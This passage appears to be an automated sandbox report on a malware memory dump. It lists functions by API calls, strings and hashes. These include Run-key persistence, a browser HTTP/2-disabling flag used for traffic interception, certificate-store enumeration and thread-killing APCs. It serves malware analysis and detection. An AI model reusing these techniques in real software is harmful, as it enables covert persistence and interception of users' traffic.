Instruction ID: b34e480b1d93bb09725a9fd1f4f2f787af87785405f8f01770ed2969da89a42b
Opcode Fuzzy Hash: bb9b42e6a3ffa2e6c9a2a0cd9a701e2413eb9f09e706224c95cb96c418509f49
Instruction Fuzzy Hash: DB416B7190024ABFDF22DFA0CC84BAEBBB9FB09344F104525F92596161D7719E14DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00CAAD28, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00CAAD39
GetTempPathA.KERNEL32(00000000,00000000,?,?,00CB0C92,00000094,00000000,00000000), ref: 00CAAD51
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00CAAD60
GetTempPathA.KERNEL32(00000001,00000000,?,?,00CB0C92,00000094,00000000,00000000), ref: 00CAAD73
GetTickCount.KERNEL32 ref: 00CAAD77
wsprintfA.USER32 ref: 00CAAD87
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00CAADBB
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 00CAADD3
lstrlen.KERNEL32(00000000), ref: 00CAADDD
RegCloseKey.ADVAPI32(?), ref: 00CAADF9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00CAAE07

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00CAADB1
%lu.exe, xrefs: 00CAAD81

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1404517112-2576086316
Opcode ID: e483a5cf6104823d2bb3e23453c469fd9bb13c2dcbdc0be26983e0fb9035088c
Instruction ID: 7ae62b750e243acb4e21300d816117403c664d57b35ce12686c4659a51572133
Opcode Fuzzy Hash: e483a5cf6104823d2bb3e23453c469fd9bb13c2dcbdc0be26983e0fb9035088c
Instruction Fuzzy Hash: 68214671401219BFDB11AFA1AC88FAF7F6CEF49399F104225F90682160EB708E55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A87A, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00CB25B8), ref: 00C9A8A3
RtlDeleteCriticalSection.NTDLL(00CBE220), ref: 00C9A8D6
RtlDeleteCriticalSection.NTDLL(00CBE240), ref: 00C9A8DD
CloseHandle.KERNEL32(?,?,00CB25B8), ref: 00C9A90C
ReleaseMutex.KERNEL32(000003F4,00000000,?,?,?,00CB25B8), ref: 00C9A91D
CloseHandle.KERNEL32(?,?,00CB25B8), ref: 00C9A929
ResetEvent.KERNEL32(00000000,00000000,?,?,?,00CB25B8), ref: 00C9A935
CloseHandle.KERNEL32(?,?,00CB25B8), ref: 00C9A941
SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00CB25B8), ref: 00C9A947
SleepEx.KERNEL32(00000064,00000001,?,?,00CB25B8), ref: 00C9A95B
HeapFree.KERNEL32(00000000,00000000,?,?,00CB25B8), ref: 00C9A97E
RtlRemoveVectoredExceptionHandler.NTDLL(00D005B8), ref: 00C9A9B7
SleepEx.KERNEL32(00000064,00000001,?,?,00CB25B8), ref: 00C9A9D3
CloseHandle.KERNEL32(07D18548,?,?,00CB25B8), ref: 00C9A9FA
LocalFree.KERNEL32(?,?,00CB25B8), ref: 00C9AA0A

Part of subcall function 00CA63E9: GetVersion.KERNEL32(?,00000000,747DF720,?,00C9A894,00000000,?,?,?,00CB25B8), ref: 00CA640D
Part of subcall function 00CA63E9: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,00C9A894,00000000,?,?,?,00CB25B8), ref: 00CA6421
Part of subcall function 00CA63E9: GetProcAddress.KERNEL32(00000000), ref: 00CA6428

Part of subcall function 00C99882: RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00C9988C
Part of subcall function 00C99882: RtlLeaveCriticalSection.NTDLL(00CBE240), ref: 00C998C8

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1924086638-0
Opcode ID: 2724cfd4214339e95fa26f49e6a1c605f68eff13459eee0ea8018efd6f53c830
Instruction ID: aeb4db8cd53e3f1964a2d75145071c20c5aedfd2b33669ef6e18f36bdd71b578
Opcode Fuzzy Hash: 2724cfd4214339e95fa26f49e6a1c605f68eff13459eee0ea8018efd6f53c830
Instruction Fuzzy Hash: C8416F31600215AFDB20BF69FD89B9D77B9BB00B04F1A0624F615D7160CBB59D44EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C94393, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00C943E2
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 00C943FB
StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00C94406
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 00C9441F
lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?), ref: 00C944C8
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00C944EA
lstrcpy.KERNEL32(00000020,?), ref: 00C94509
lstrlen.KERNEL32(?,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001,00000000), ref: 00C94513
memcpy.NTDLL(?,?,?,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 00C94554
memcpy.NTDLL(?,?,?,?,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?), ref: 00C94567
SwitchToThread.KERNEL32(00000057,00000000,?,0000010F,?,?,?,?,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057), ref: 00C9458B
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000010F,?,?,?,?,?,00000000,00C9B033,?,00000000,0000010F), ref: 00C945AA
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?), ref: 00C945D0
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,00C9B033,?,00000000,0000010F,00000001,00000057,?), ref: 00C945EC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: 61b2126985095acfc3d015747ce6f4c51ae8014fdb771eac443d83f4409a9bc3
Instruction ID: 3894d8377a7114a9f2f1cb48ec3c51859381b5840d536e6ce97deb05f8f05919
Opcode Fuzzy Hash: 61b2126985095acfc3d015747ce6f4c51ae8014fdb771eac443d83f4409a9bc3
Instruction Fuzzy Hash: 99715B71504301AFDB25DF64DC49F9EBBE8BB48304F044A2EF59992260D774EA4ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C95068, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00C95082
PathFindFileNameW.SHLWAPI(?), ref: 00C95098
lstrlenW.KERNEL32(00000000), ref: 00C950DB
RtlAllocateHeap.NTDLL(00000000,00CB69FC), ref: 00C950F1
memcpy.NTDLL(00000000,00000000,00CB69FA), ref: 00C95104
_wcsupr.NTDLL ref: 00C9510F
lstrlenW.KERNEL32(?,00CB69FA), ref: 00C95148
RtlAllocateHeap.NTDLL(00000000,?,00CB69FA), ref: 00C9515D
lstrcpyW.KERNEL32(00000000,?), ref: 00C95173
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 00C95191
HeapFree.KERNEL32(00000000,00000000), ref: 00C951A0

Strings

--use-spdy=off --disable-http2, xrefs: 00C9518B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: 28b7b3856be0efafcde488cbcb542944650afcd8b3b77e3be5a062ad550ed266
Instruction ID: 00efa213e54d9f6a6f8aafcde23b5b02df759b534f0552755af13b367715f7bc
Opcode Fuzzy Hash: 28b7b3856be0efafcde488cbcb542944650afcd8b3b77e3be5a062ad550ed266
Instruction Fuzzy Hash: EB31D436500A15ABCB225F64EC8CB6F7BACEB45321F150729F662D3191DF71AD05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CABDEF, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00CABE13
GetCurrentThreadId.KERNEL32 ref: 00CABE29
GetCurrentThread.KERNEL32 ref: 00CABE3A

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

Part of subcall function 00C981A5: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00CABE81,00000020,00000000,?,00000000), ref: 00C98210
Part of subcall function 00C981A5: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00CABE81,00000020,00000000,?,00000000), ref: 00C98238

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00CABEAF
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00CABEBF
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00CABF0B
wsprintfA.USER32 ref: 00CABF1C
lstrlen.KERNEL32(00000000,00000000), ref: 00CABF27
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00CABF41

Strings

DLL load status: %u, xrefs: 00CABF16
W, xrefs: 00CABEF8
PluginRegisterCallbacks, xrefs: 00CABECB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: cef26c1a3321d55b207db0d1affcee9141f65450bc33b1e3ae91f2085e84f856
Instruction ID: dbb54b6e97dca3f38d950fae55a70311e2aa0246ce0f22fdd0de57b34d24100d
Opcode Fuzzy Hash: cef26c1a3321d55b207db0d1affcee9141f65450bc33b1e3ae91f2085e84f856
Instruction Fuzzy Hash: 0441493190121AFBCB11AFA5EC48BEE7FB9FF46789F104115F90692161DB348A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA05EF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 00CA061C
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00CA0628
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA0639
memset.NTDLL ref: 00CA0656
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00CA0664
WaitForSingleObject.KERNEL32(00000000), ref: 00CA0672
GetDriveTypeW.KERNEL32(?), ref: 00CA0680
lstrlenW.KERNEL32(?), ref: 00CA068C
wcscpy.NTDLL ref: 00CA069F
lstrlenW.KERNEL32(?), ref: 00CA06B9
HeapFree.KERNEL32(00000000,?), ref: 00CA06D2

Strings

\\?\, xrefs: 00CA0613

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: 682fc405b3be7b9e315be0c850a51a3aa287e1ef0567ac08a93d3590e2cd6d1b
Instruction ID: 2956d8a3331833ad28d3370d40c4c1837607b1b283d2c73c9b59d82df6e4f561
Opcode Fuzzy Hash: 682fc405b3be7b9e315be0c850a51a3aa287e1ef0567ac08a93d3590e2cd6d1b
Instruction Fuzzy Hash: D1318E32801109BFCB11ABA9EC48EDEBFBDFF4A368F604115F404E2060DB309A15DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4C88, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00CA4C9F
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00CB0E25,00000094,00000000,00000001,00000094,00000000,00000000,00C945A1,00000000,00000094,00000000), ref: 00CA4CB1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00CB0E25,00000094,00000000,00000001,00000094,00000000,00000000,00C945A1,00000000,00000094,00000000), ref: 00CA4CBE
wsprintfA.USER32 ref: 00CA4CD2
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,00C945A1,00000000,00000094,00000000), ref: 00CA4CE8
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 00CA4D01
WriteFile.KERNEL32(00000000,00000000), ref: 00CA4D09
GetLastError.KERNEL32 ref: 00CA4D17
CloseHandle.KERNEL32(00000000), ref: 00CA4D20
GetLastError.KERNEL32(?,00000000,?,00CB0E25,00000094,00000000,00000001,00000094,00000000,00000000,00C945A1,00000000,00000094,00000000), ref: 00CA4D31
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00CB0E25,00000094,00000000,00000001,00000094,00000000,00000000,00C945A1,00000000,00000094,00000000), ref: 00CA4D41

Strings

\\.\%s, xrefs: 00CA4CCC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: bdfb800d13a9b1b448b3fcfa0d91ef104ef5b1f2175d7247c22ff58e1296fbfe
Instruction ID: 78e16028f813f9b4229a8600d09218e2749a207dca9f23142cc1b82a5477ae55
Opcode Fuzzy Hash: bdfb800d13a9b1b448b3fcfa0d91ef104ef5b1f2175d7247c22ff58e1296fbfe
Instruction Fuzzy Hash: BA118171545215BFD6253B64BC8CF7F3A6CEB827A9F040628F946921A0EFA00D49C671

Uniqueness

Uniqueness Score: -1.00%

Function 00CB23B3, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

DeleteFileA.KERNEL32(00000000,000004D2), ref: 00CB23D6
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00CB23DF
GetLastError.KERNEL32 ref: 00CB23E9
HeapFree.KERNEL32(00000000,00000000), ref: 00CB246D

Strings

AuthRoot, xrefs: 00CB240A
Root, xrefs: 00CB242B
TrustedPublisher, xrefs: 00CB2441
CertificateAuthority, xrefs: 00CB2415
Disallowed, xrefs: 00CB2420
TrustedPeople, xrefs: 00CB2436
AddressBook, xrefs: 00CB23FF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: dfe786222eac33dc6a0ae85412244f36bfa372189d910a631eb135d21b7c246e
Instruction ID: af3dea2b069f8e833c302fe97778d936a963c0f522e8df35adafa008a7c94aad
Opcode Fuzzy Hash: dfe786222eac33dc6a0ae85412244f36bfa372189d910a631eb135d21b7c246e
Instruction Fuzzy Hash: 38018426A81A60B2C92637B2FC0FFDF2D1CDF2A7B1F250125F509A20D19E944604E2F6

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A7B1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,747DF5B0,00CA7D3D,61636F4C,00000001,?,?), ref: 00C9A7D7
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C9A7E3
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 00C9A7FA
GetProcAddress.KERNEL32(00000000), ref: 00C9A801
Thread32First.KERNEL32(?,0000001C), ref: 00C9A811
OpenThread.KERNEL32(001F03FF,00000000,00CA7D3D), ref: 00C9A82C
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 00C9A83D
CloseHandle.KERNEL32(00000000), ref: 00C9A844
Thread32Next.KERNEL32(?,0000001C), ref: 00C9A84D
CloseHandle.KERNEL32(?), ref: 00C9A859

Strings

ExitProcess, xrefs: 00C9A7F0
KERNEL32.DLL, xrefs: 00C9A7F5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: f63b49b79830d337e3557be477874c957958e81ceffff00e348c1d5ac0d85ee1
Instruction ID: e0610f6206cf2f1c6620945372708a36143945d39d597e9b3a56beaff317eadf
Opcode Fuzzy Hash: f63b49b79830d337e3557be477874c957958e81ceffff00e348c1d5ac0d85ee1
Instruction Fuzzy Hash: D9115172900118EFDF106FA4DC89EEE7B7DEB04395F10413AFA11A61A0DB708E46DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0758, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CAB8FB: RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CAB903
Part of subcall function 00CAB8FB: RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CAB918
Part of subcall function 00CAB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00CAB931

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 00CA078E
memset.NTDLL ref: 00CA079F
lstrcmpi.KERNEL32(?,?), ref: 00CA07DF
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CA0808
memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00C9B24E), ref: 00CA081C
memset.NTDLL ref: 00CA0829
memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CA0842
memcpy.NTDLL(-00000005,HIDDEN,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CA085D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00C9B24E), ref: 00CA087A

Strings

HIDDEN, xrefs: 00CA0857
Blocked, xrefs: 00CA0761, 00CA088A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 1c546b289c6ea219680539c4f90e65a72699713394115ef908fd01531a65d733
Instruction ID: 073ab8735d1bcb741ca3996c04e8fc28c7873ebcdfa7cf56f366fca36fc7a4e0
Opcode Fuzzy Hash: 1c546b289c6ea219680539c4f90e65a72699713394115ef908fd01531a65d733
Instruction Fuzzy Hash: D541BE31E0020AEFDB109FA5DC85B9EBBB9FF05398F244128E415E3291D734AE05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4CD0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00CB4CEC

Part of subcall function 00CAE55A: RegCloseKey.ADVAPI32(?,?,?,00CB4D11,00000000,00000000,00000000,00000000), ref: 00CAE5E1

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB4D24
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CB4D35
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 00CB4D70
RegCloseKey.ADVAPI32(?), ref: 00CB4D9B
RtlEnterCriticalSection.NTDLL(00000000), ref: 00CB4DB1
HeapFree.KERNEL32(00000000,?), ref: 00CB4DC6
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00CB4DD6
HeapFree.KERNEL32(00000000,?), ref: 00CB4DEB
RegCloseKey.ADVAPI32(?), ref: 00CB4DF0

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00CB4CDC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 4138089493-1428018034
Opcode ID: 1541c36aa15e5498ee2bf2f558dc2d150c2f9ef215033bcf60634ee250c6fc91
Instruction ID: 3303bca3f02268e1d451891e407abbe45823821cfb07cd549d404baffb3c4d24
Opcode Fuzzy Hash: 1541c36aa15e5498ee2bf2f558dc2d150c2f9ef215033bcf60634ee250c6fc91
Instruction Fuzzy Hash: F6311375900109BFCB11AFA8EC48EEEBBBAFB44744F104265F516E2161E7319A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAEBD0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00CAEBE0
CreateFileW.KERNEL32(00CB0C37,80000000,00000003,00CBE0D4,00000003,00000000,00000000,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEBFD
GetLastError.KERNEL32(?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC9E

Part of subcall function 00CA6AB9: lstrlen.KERNEL32(?,00000000,00CAEC1E,00000027,00CBE0D4,?,00000000,?,?,00CAEC1E,Local\,00000001,?,00CB0C37,00000000,00000000), ref: 00CA6AEF
Part of subcall function 00CA6AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 00CA6B13
Part of subcall function 00CA6AB9: lstrcat.KERNEL32(00000000,00000000), ref: 00CA6B1B

GetFileSize.KERNEL32(00CB0C37,00000000,Local\,00000001,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC29
CreateFileMappingA.KERNEL32(00CB0C37,00CBE0D4,00000002,00000000,00000000,00CB0C37), ref: 00CAEC3D
lstrlen.KERNEL32(00CB0C37,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC59
lstrcpy.KERNEL32(?,00CB0C37), ref: 00CAEC69
GetLastError.KERNEL32(?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC71
HeapFree.KERNEL32(00000000,00CB0C37,?,00CB0C37,00000000,00000000,00C945A1,00000000), ref: 00CAEC84
CloseHandle.KERNEL32(00CB0C37,Local\,00000001,?,00CB0C37), ref: 00CAEC96

Strings

Local\, xrefs: 00CAEC11

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: 2be173c6541b4416d24fafba90520621af100041d74e0f57b6ecbe39af7f6e7b
Instruction ID: 36f25cdf8eae6ff6609dbde0c74117ea24610c39abde93f1003e73b9731e7086
Opcode Fuzzy Hash: 2be173c6541b4416d24fafba90520621af100041d74e0f57b6ecbe39af7f6e7b
Instruction Fuzzy Hash: 1121EA71900209FFDB10AFA5EC88B9DBFB9EB05399F108569F515E2260D7748E48DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB43D8, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB43FF
memcpy.NTDLL(?,?,00000010), ref: 00CB4422
memset.NTDLL ref: 00CB446E
lstrcpyn.KERNEL32(?,?,00000034), ref: 00CB4482
GetLastError.KERNEL32 ref: 00CB44B0
GetLastError.KERNEL32 ref: 00CB44F3
GetLastError.KERNEL32 ref: 00CB4512
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00CB454C
WaitForSingleObject.KERNEL32(?,00000000), ref: 00CB455A
GetLastError.KERNEL32 ref: 00CB45CF
ReleaseMutex.KERNEL32(?), ref: 00CB45E1
RtlExitUserThread.NTDLL(?), ref: 00CB45F7

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 52db0e691c729484d86114790137cc697a17f29d5e812374b32759787bf34b98
Instruction ID: 8f2adecb20bc3a1864521ac4c498b0b5eb59bc44a7e03d0932c20926dcfc9ccd
Opcode Fuzzy Hash: 52db0e691c729484d86114790137cc697a17f29d5e812374b32759787bf34b98
Instruction Fuzzy Hash: 04617D71508700AFC725AF659C48B6BB7F9BF84710F008A19F5A6D2191EB70EA08CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00C95A92, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C95AC4
WaitForSingleObject.KERNEL32(000003EC,00000000), ref: 00C95AE6
ConnectNamedPipe.KERNEL32(?,?), ref: 00C95B06
GetLastError.KERNEL32 ref: 00C95B10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C95B34
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 00C95B77
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 00C95B80
WaitForSingleObject.KERNEL32(00000000), ref: 00C95B89
CloseHandle.KERNEL32(?), ref: 00C95B9E
GetLastError.KERNEL32 ref: 00C95BAB
CloseHandle.KERNEL32(?), ref: 00C95BB8
RtlExitUserThread.NTDLL(000000FF), ref: 00C95BCE

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

